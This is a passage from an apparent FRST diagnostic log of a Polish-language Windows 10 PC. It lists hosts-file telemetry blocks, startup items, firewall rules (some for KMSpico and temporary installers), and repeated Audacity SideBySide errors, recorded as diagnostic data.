watson.telemetry.microsoft.com.nsatc.net 127.0.0.1 redir.metaservices.microsoft.com 127.0.0.1 choice.microsoft.com 127.0.0.1 choice.microsoft.com.nsatc.net 127.0.0.1 df.telemetry.microsoft.com 127.0.0.1 reports.wes.df.telemetry.microsoft.com 127.0.0.1 wes.df.telemetry.microsoft.com 127.0.0.1 services.wes.df.telemetry.microsoft.com 127.0.0.1 sqm.df.telemetry.microsoft.com 127.0.0.1 telemetry.microsoft.com 127.0.0.1 watson.ppe.telemetry.microsoft.com 127.0.0.1 telemetry.appex.bing.net 127.0.0.1 telemetry.urs.microsoft.com 127.0.0.1 telemetry.appex.bing.net:443 127.0.0.1 settings-sandbox.data.microsoft.com 127.0.0.1 vortex-sandbox.data.microsoft.com 127.0.0.1 survey.watson.microsoft.com 127.0.0.1 watson.live.com 127.0.0.1 watson.microsoft.com 127.0.0.1 statsfe2.ws.microsoft.com 127.0.0.1 corpext.msitadfs.glbdns2.microsoft.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Kuba\Pictures\Saved Pictures\miecze.png DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == HKLM\...\StartupApproved\StartupFolder: => "HP Digital Imaging Monitor.lnk" HKLM\...\StartupApproved\Run: => "RTHDVCPL" HKLM\...\StartupApproved\Run: => "NvBackend" HKLM\...\StartupApproved\Run: => "ShadowPlay" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run32: => "HP Software Update" HKLM\...\StartupApproved\Run32: => "Bonus.SSR.FR12" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "NvBackend" HKLM\...\StartupApproved\Run32: => "amd_dc_opt" HKLM\...\StartupApproved\Run32: => "HDD Regenerator" HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud" HKLM\...\StartupApproved\Run32: => "APSDaemon" HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "DAEMON Tools Pro Agent" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "uTorrent" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "Sony PC Companion" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "Lync" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "Steam" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "Spotify" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "Spotify Web Helper" HKU\S-1-5-21-3338460377-1035617240-3592817547-1001\...\StartupApproved\Run: => "IVONA Reader" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [UDP Query User{3F82A4D5-6301-4838-BC0E-43E1EAD39000}D:\delta media player\dmplayer.exe] => (Allow) D:\delta media player\dmplayer.exe FirewallRules: [TCP Query User{53C98270-B938-42D5-A805-05580C767E63}D:\delta media player\dmplayer.exe] => (Allow) D:\delta media player\dmplayer.exe FirewallRules: [UDP Query User{13704FF0-2F8C-467E-A7F8-AC1CD3193136}D:\kodi\kodi.exe] => (Allow) D:\kodi\kodi.exe FirewallRules: [TCP Query User{F1980071-798C-4948-A301-AA64D4E44FAF}D:\kodi\kodi.exe] => (Allow) D:\kodi\kodi.exe FirewallRules: [UDP Query User{8E2F95C7-2F33-4FA0-A9A2-8BE004310496}C:\users\kuba\desktop\poradniki\teamspeak3-server_win64\ts3server.exe] => (Allow) C:\users\kuba\desktop\poradniki\teamspeak3-server_win64\ts3server.exe FirewallRules: [TCP Query User{6B643E74-F971-4D52-B325-714B39A789A7}C:\users\kuba\desktop\poradniki\teamspeak3-server_win64\ts3server.exe] => (Allow) C:\users\kuba\desktop\poradniki\teamspeak3-server_win64\ts3server.exe FirewallRules: [UDP Query User{91888A4C-5B42-4D4C-B5D0-836FB0F64DAE}C:\users\kuba\desktop\poradniki\teamspeak3-server\ts3server.exe] => (Allow) C:\users\kuba\desktop\poradniki\teamspeak3-server\ts3server.exe FirewallRules: [TCP Query User{556008BD-C2EF-4132-BFBC-BFD1292F8AEB}C:\users\kuba\desktop\poradniki\teamspeak3-server\ts3server.exe] => (Allow) C:\users\kuba\desktop\poradniki\teamspeak3-server\ts3server.exe FirewallRules: [{8079FC2D-CADE-473E-A985-B2CA1448037D}] => (Allow) D:\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe FirewallRules: [{E49C3A2B-F099-4C73-B15B-289F2F575FE7}] => (Allow) D:\FormatFactory\FormatFactory.exe FirewallRules: [{F0BC70D9-3D67-48E6-A85E-949EEBBBBD07}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{00EE5B68-E63E-4DC3-9D50-2B0E0FA4AE83}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{60B5D0F5-EF03-415F-BE56-1B42ACD317C1}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{5A660426-D8B8-479A-A7CB-814339E5F17E}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{3010EE0D-77C4-4C57-AC7A-1BE9C14BD3B4}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{16CD6634-A553-4EDD-81EF-B7B43392620E}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{C3CF9172-B662-475C-9513-F3ED2FED186F}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\nsl76B3.tmp\CnetInstaller-75755206.exe FirewallRules: [{4074FFF7-D2A8-48FE-B5E9-60DE80A3F2A9}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\nsl76B3.tmp\CnetInstaller-75755206.exe FirewallRules: [{5B86A4B5-CBA3-43B4-92E0-C718806CBBE1}] => (Allow) D:\Assassin's Creed III\AssassinsCreed3.exe FirewallRules: [{AC4C6F39-A6E6-4E11-AC93-AFE784DB1B37}] => (Allow) D:\Assassin's Creed III\AssassinsCreed3.exe FirewallRules: [{8B694361-BB0D-4D99-8317-269A5C28600E}] => (Allow) D:\Assassin's Creed III\AC3MP.exe FirewallRules: [{35A61232-5CC7-4335-B54F-03C0D52313E0}] => (Allow) D:\Assassin's Creed III\AC3MP.exe FirewallRules: [{7222BF68-53FF-448C-A19F-E48FC0B2A049}] => (Allow) D:\Assassin's Creed III\AC3SP.exe FirewallRules: [{0D91C0B2-87D0-4212-93BF-1EF657D73CAF}] => (Allow) D:\Assassin's Creed III\AC3SP.exe FirewallRules: [{E36120BE-0D9A-4185-9516-1A38BAE4B51D}] => (Block) D:\Assassin's Creed III\orbit\UbisoftGameLauncher.exe FirewallRules: [{3B9DDD8A-79AA-40AC-8B8F-07182DA9EC71}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{9040BD26-E85B-450A-A15D-D279D7A59813}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{8EAC980C-6521-4D2E-989A-CCDED58E3CAC}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{92D5FDC9-E693-4B0C-910C-58475C1D3A60}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{270516C6-FF7E-4F9E-86C0-CA79D047EA57}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E5115BDE-008F-445F-B790-5573E0331514}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{166957C9-6655-472B-80B3-78202748CA21}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{AC0A6BFC-EC9A-443B-A3D0-236EAA56499F}] => (Allow) D:\KMSpico\Service_KMS.exe FirewallRules: [{B144A6C1-C894-483B-9A0A-8CDA38557A61}] => (Allow) D:\KMSpico\Service_KMS.exe FirewallRules: [{9D1872C4-9B5E-486D-B97C-C47BCC767ADF}] => (Allow) LPort=1688 FirewallRules: [{195526CA-F155-48FC-9E7F-8C477A87CCEE}] => (Allow) D:\Assassin's Creed Brotherhood\ACBMP.exe FirewallRules: [{6FC96E85-73BC-4941-843C-89C4C51F4B49}] => (Allow) D:\Assassin's Creed Brotherhood\ACBMP.exe FirewallRules: [{B8642710-FE84-4505-9BF1-CEEDB54B0C40}] => (Allow) D:\Steam\Steam.exe FirewallRules: [{0B98F0A9-55F2-4088-8465-C3AD2DDFA87A}] => (Allow) D:\Steam\Steam.exe FirewallRules: [{EE31B3F3-3300-4CED-B7A2-FD4A9B12F74E}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\7zS56E0\HPDiagnosticCoreUI.exe FirewallRules: [{7C503FC0-A575-4C0E-80C6-CF05CB3E935C}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\7zS56E0\HPDiagnosticCoreUI.exe FirewallRules: [UDP Query User{5443203F-31E6-4375-A120-92DB47524A01}D:\fifa 14\fifa 14\game\fifa14.exe] => (Allow) D:\fifa 14\fifa 14\game\fifa14.exe FirewallRules: [TCP Query User{DF653BD3-6FED-4BC7-BAA8-0AB83848BECE}D:\fifa 14\fifa 14\game\fifa14.exe] => (Allow) D:\fifa 14\fifa 14\game\fifa14.exe FirewallRules: [UDP Query User{517A4900-7569-45EF-B360-17E8F194BA7A}D:\wow\wowplauncher.exe] => (Allow) D:\wow\wowplauncher.exe FirewallRules: [TCP Query User{ED8CE57B-A4A9-4ADB-B51F-B06115819AA1}D:\wow\wowplauncher.exe] => (Allow) D:\wow\wowplauncher.exe FirewallRules: [{C3B4AF07-3C69-4A16-80A8-D7255A49D9E3}] => (Allow) C:\Program Files (x86)\KMSpicoPortable\KMSServer.exe FirewallRules: [{F330202A-F8BA-4401-9B61-97F259F28750}] => (Allow) C:\Program Files (x86)\KMSpicoPortable\KMSServer.exe FirewallRules: [{E515684C-6113-4291-91F7-8FF52183B93F}] => (Allow) C:\Program Files (x86)\KMSpicoPortable\AutoPico.exe FirewallRules: [{BB2FCC4C-9D3E-4326-A6C8-0E3729B335A1}] => (Allow) C:\Program Files (x86)\KMSpicoPortable\AutoPico.exe FirewallRules: [{CDD10053-096D-45DA-8A2C-032709A39037}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\nsz837D.tmp\Installer-75755206.exe FirewallRules: [{794526AD-A50A-46D3-8427-398463BA293C}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\nsz837D.tmp\Installer-75755206.exe FirewallRules: [{6A7CE7C0-3E43-4F67-A061-FCEA30AA7D7C}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\nsmC242.tmp\Installer-75755206.exe FirewallRules: [{AE647778-B3BB-4FDF-8248-1E320CFE1A07}] => (Allow) C:\Users\Kuba\AppData\Local\Temp\nsmC242.tmp\Installer-75755206.exe FirewallRules: [{FDE22E79-6EA1-4EBD-80B3-320EFFF63A8F}] => (Allow) D:\Assassins Creed Rogue\ACC.exe FirewallRules: [{A679B573-A3F5-4905-BA09-A974FDBC1F0B}] => (Allow) D:\Assassins Creed Rogue\ACC.exe FirewallRules: [{31905B20-FA87-4FF1-993D-12D8B7BBA028}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{0E3BD9C5-DF9F-4570-8388-09593BF43238}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{CF9024A8-F223-4C56-BBB7-BDA19ADF51AD}] => (Allow) D:\Gothic 3\Gothic3.exe FirewallRules: [{D1B0E1C0-883A-4775-850F-C98384AF7206}] => (Allow) D:\Gothic 3\Gothic3.exe FirewallRules: [{78C8D3C0-898E-4557-A1A3-F3D3F4A3A109}] => (Allow) D:\Steam\bin\steamwebhelper.exe FirewallRules: [{3358F7B7-BFF0-4608-8C65-6B5A07099AA5}] => (Allow) D:\Steam\bin\steamwebhelper.exe FirewallRules: [{22C05615-0003-46A7-89E8-D1A4F7E74E68}] => (Allow) D:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{A02F334E-99DC-45E3-A299-3DC731A66B31}] => (Allow) D:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{AF05CD9A-18D4-414D-BE15-AA53D7E0D799}] => (Allow) D:\GTX Box Team\FIFA 14\Game\fifa14-3dm.exe FirewallRules: [{32B624B2-66EB-4BBF-9720-74EF4EF72890}] => (Allow) D:\GTX Box Team\FIFA 14\Game\fifa14-3dm.exe FirewallRules: [{A637CC2D-1164-4270-81B1-979E123701E1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe FirewallRules: [{9DEAB1AF-CC2D-4765-A613-219C78D8FE83}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqste08.exe FirewallRules: [{39E2D8B7-D871-45D5-88A1-9A82E7FBC573}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxm08.exe FirewallRules: [{DF4AC7C8-1D97-4218-91DF-FD06123C9025}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposfx08.exe FirewallRules: [{0763A474-2A7B-490A-9F99-34D6B41FEE7F}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hposid01.exe FirewallRules: [{9DB3E4C4-5898-4615-9E70-389B4A9D443E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqkygrp.exe FirewallRules: [{C18E5B10-DC34-4EA5-9ED1-0B0382509306}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcopy2.exe FirewallRules: [{F299D652-097B-4D3A-9D9B-FFFD139D443E}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpfccopy.exe FirewallRules: [{33581534-80AA-449F-BE46-CBC9F32DFC2A}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpzwiz01.exe FirewallRules: [{CE041AAC-4A0D-4679-8BC4-22B404C05677}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exe FirewallRules: [{A85EEFF3-D248-4F30-AC36-363B2D3349E8}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqnrs08.exe FirewallRules: [{889931C6-79CC-4832-A8A8-729B9C54773B}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exe FirewallRules: [{76966A7F-E8A2-4E08-BCEC-40DE7B79CC2D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpofxs08.exe FirewallRules: [{00C8BDCC-55FB-4E84-8B7C-FEC6E565736D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqfxt08.exe FirewallRules: [{20D9BF5B-E20E-44A8-A7D6-948FBAAB7B6C}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exe FirewallRules: [{6541FE1D-6FBE-4478-A40A-4B6000766AFB}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe FirewallRules: [{CD5C4E4C-A489-41F3-BBA4-0794638CAFB1}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exe FirewallRules: [{7DB0C1E5-2928-4015-B36E-2DE2475F5C29}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exe FirewallRules: [{10E78A40-A4DE-4C82-8676-EB8E5E23BD85}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exe FirewallRules: [{D4AB056B-48DE-470E-8DC2-E17E00C4A691}] => (Allow) D:\Visual studio\Common7\IDE\devenv.exe FirewallRules: [{27AE969E-ACC9-4B69-A214-E865EFECEC77}] => (Allow) D:\Visual studio\Common7\IDE\devenv.exe FirewallRules: [{1F2BC375-C9A0-48F4-A425-8789C4B7D23E}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{58FFF775-06F7-4134-8011-CD754CBC92D8}] => (Allow) C:\Users\Kuba\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{7AC1B750-355F-4A9B-811B-12D07DC8E2D0}] => (Allow) %systemroot%\system32\alg.exe FirewallRules: [{489A120D-D075-4EEF-B205-035540C683AD}] => (Allow) D:\Risen\bin\Risen.exe FirewallRules: [{850EE5E9-1464-4F71-AE71-CD62478D0493}] => (Allow) D:\Risen\bin\Risen.exe FirewallRules: [{4AC93B95-BEAA-4362-8B33-E32A60F811A8}] => (Allow) D:\Battlefield Bad Company 2\BFBC2Updater.exe FirewallRules: [{A7C22C92-8C52-44CB-A23A-674CF3851C3A}] => (Allow) D:\Battlefield Bad Company 2\BFBC2Updater.exe FirewallRules: [{87CBDA9E-9CE7-43CB-93EE-091D48363284}] => (Allow) D:\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe FirewallRules: [{0E8EC3A3-CA32-4115-BC07-3354D138A74D}] => (Allow) D:\FormatFactory\FormatFactory.exe FirewallRules: [{87F6AC03-69BB-4FAD-8E72-F290EB6CF004}] => (Allow) D:\FormatFactory\FormatFactory.exe FirewallRules: [{4E87B67E-50CA-4A4A-BED3-3FE2A2000D89}] => (Allow) D:\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe FirewallRules: [{DD88FEA5-A822-4DEB-85CA-A3660D7A86BF}] => (Allow) D:\FormatFactory\FFModules\Package\PTInstOnline.exe FirewallRules: [{5052039E-CD77-49B4-8C2B-8A2D5B9A9506}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe FirewallRules: [{2B2A3C6A-4773-4FAB-B0E9-FF282DCFE326}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe FirewallRules: [{0E164098-4075-4D92-A097-4E6F5F32C131}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{0A8CB0DC-847C-4C74-ADA3-2E86E465F756}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{B2960F97-7AFC-4F9B-99D5-FED4C9594E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{FAC25282-BFD2-4B8E-B34C-F7CF6F26D39D}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{BA6AEC39-657C-49D0-A3D1-A9CD2B6CBE0E}] => (Allow) D:\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{383BD0B5-283C-442F-8A82-83D5E151CF22}] => (Allow) D:\The Elder Scrolls V Skyrim Legendary Edition\SkyrimLauncher.exe FirewallRules: [{7BD76E33-28F8-41DE-88F6-B3AC5700DED7}] => (Allow) D:\The Elder Scrolls V Skyrim Legendary Edition\SkyrimLauncher.exe FirewallRules: [{597E6992-108D-4690-8C4A-5C8231710094}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [TCP Query User{51439479-6EA3-4D80-9405-F6E74D108B01}C:\users\kuba\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kuba\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{EFC8A37C-1CF8-4865-AD20-63F6CE50FA81}C:\users\kuba\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\kuba\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{E2DE5658-A08D-4131-9ED1-F982E9E21AC6}D:\fifa 14\game\fifa14.exe] => (Allow) D:\fifa 14\game\fifa14.exe FirewallRules: [UDP Query User{D92EF806-36D6-4B0F-814D-307D2C6A76E0}D:\fifa 14\game\fifa14.exe] => (Allow) D:\fifa 14\game\fifa14.exe FirewallRules: [{721820DF-EDA2-4235-9DCE-B6C841149456}] => (Allow) D:\Assassin's Creed III\AC3SP.exe FirewallRules: [{519CA7A3-F917-48C2-9EC2-0BC391AC71D5}] => (Allow) D:\Assassin's Creed III\AC3SP.exe FirewallRules: [{B6D14883-2DB5-4228-87AC-E6D6F7C69898}] => (Allow) D:\Assassin's Creed III\AC3MP.exe FirewallRules: [{AD9FCB8B-1E25-436F-8AA0-619A8169EB30}] => (Allow) D:\Assassin's Creed III\AC3MP.exe FirewallRules: [{FC71DE63-98CE-41A7-99CE-E0DA14D1024A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{9FE3FB4D-7330-41F4-A6DC-3FEDF92112E4}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{312E6E04-A869-42D5-9E95-42E8906454CB}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{A76E329B-C5F1-4806-8135-2D1AD81CC08B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [TCP Query User{C1C5F9E9-1965-4D84-B74B-2EA3A3344B0F}C:\program files (x86)\java\bin\java.exe] => (Allow) C:\program files (x86)\java\bin\java.exe FirewallRules: [UDP Query User{BA47B202-42B5-4BD2-B835-3C38E4229778}C:\program files (x86)\java\bin\java.exe] => (Allow) C:\program files (x86)\java\bin\java.exe FirewallRules: [TCP Query User{31808776-7225-44EF-88BA-DE622F16FD5F}C:\program files (x86)\java\bin\javaw.exe] => (Allow) C:\program files (x86)\java\bin\javaw.exe FirewallRules: [UDP Query User{372C7AD2-CA28-44BA-B5E9-87F1A26D1940}C:\program files (x86)\java\bin\javaw.exe] => (Allow) C:\program files (x86)\java\bin\javaw.exe FirewallRules: [{99779942-9636-4821-8EB8-3E5000700D10}] => (Allow) D:\Hamachi\hamachi-2-ui.exe FirewallRules: [{0EC20E3C-D916-4B9A-9175-C52BA835BE9A}] => (Allow) D:\Minecraft\ExtremeLauncher.exe FirewallRules: [{A15616F3-2BD9-4D26-A334-66C7E923F9F3}] => (Allow) D:\Minecraft\ExtremeLauncher.exe FirewallRules: [{2BAE4BC3-E7B6-44BB-9CF7-B1C205FDBD08}] => (Allow) D:\Hamachi\hamachi-2-ui.exe FirewallRules: [{F44C2DB8-29D3-4935-B6C7-C5BC335780C6}] => (Allow) D:\Gry\FIFA 14\Game\fifa14.exe FirewallRules: [{6143BA54-1508-4DC4-A1B6-7861114BF152}] => (Allow) D:\Gry\FIFA 14\Game\fifa14.exe FirewallRules: [TCP Query User{AFAD287C-CFD0-4A51-9305-CAA4AFD7FFE8}D:\android\android studio\jre\bin\java.exe] => (Allow) D:\android\android studio\jre\bin\java.exe FirewallRules: [UDP Query User{BE2C6871-D469-414C-8FCE-D884816F55FB}D:\android\android studio\jre\bin\java.exe] => (Allow) D:\android\android studio\jre\bin\java.exe FirewallRules: [{4B54AAB7-1F48-4529-A97E-B49AA0EF8001}] => (Block) D:\android\android studio\jre\bin\java.exe FirewallRules: [{FAB0F150-9CFC-4DCA-BADF-D3DCE6643378}] => (Block) D:\android\android studio\jre\bin\java.exe FirewallRules: [{999813A9-C2FD-4ED4-9ED0-0FACFEA07F39}] => (Allow) D:\TeamViewer\TeamViewer.exe FirewallRules: [{51F9B3AD-CE00-4DF1-B145-FD0A26D553B1}] => (Allow) D:\TeamViewer\TeamViewer.exe FirewallRules: [{F5E75EF5-CC27-4F24-824B-2C6CA5218A63}] => (Allow) D:\TeamViewer\TeamViewer_Service.exe FirewallRules: [{C73E0F27-11D8-4EB0-A31B-01FF117021C4}] => (Allow) D:\TeamViewer\TeamViewer_Service.exe FirewallRules: [{DD3C0068-00DB-412D-84A1-FFDFA43334EE}] => (Allow) D:\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{3A9841BA-D871-4450-AB0F-46FA1FCB1840}] => (Allow) D:\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6B985F2D-8C03-4415-9974-9F81648407F5}] => (Allow) D:\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{A1829C85-C828-4FDE-885E-9DF0D17E5026}] => (Allow) D:\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{FC422451-865B-475C-B6D4-A4F2EFFA1EB1}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe FirewallRules: [{F066E48F-F30B-4EFF-BE76-93A074FD460D}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe FirewallRules: [TCP Query User{CC4AB43B-DEF0-469E-A622-15257705E39E}D:\pro evolution soccer 2016\pes2016.exe] => (Allow) D:\pro evolution soccer 2016\pes2016.exe FirewallRules: [UDP Query User{DA111AA5-1CC2-4B5D-8DDA-8D03D5B10959}D:\pro evolution soccer 2016\pes2016.exe] => (Allow) D:\pro evolution soccer 2016\pes2016.exe FirewallRules: [{EF262AF9-2E6C-46D5-9558-C516CC3C89DB}] => (Block) D:\pro evolution soccer 2016\pes2016.exe FirewallRules: [{26C49B26-7DAD-48B8-8931-DB3F99B8F04D}] => (Block) D:\pro evolution soccer 2016\pes2016.exe FirewallRules: [{3BF53995-E033-4E0C-974C-27F751EDE230}] => (Allow) D:\FormatFactory\FFModules\Encoder\Doc\EBookCodec.exe FirewallRules: [{ABBCC3C5-CFE6-4610-B5B8-17E8394423EF}] => (Allow) D:\FormatFactory\FormatFactory.exe ==================== Restore Points ========================= 25-01-2018 21:28:49 Windows Update ==================== Faulty Device Manager Devices ============= Name: Koprocesor Description: Koprocesor Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Event log errors: ========================= Application errors: ================== Error: (01/26/2018 04:48:08 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/26/2018 04:48:08 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/26/2018 04:47:45 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/26/2018 04:47:45 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/25/2018 10:48:14 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „D:\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_15c8cdae9364c23b.manifest. Składnik 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.192_none_5d760485a7e0eb41.manifest. Error: (01/25/2018 10:28:58 PM) (Source: 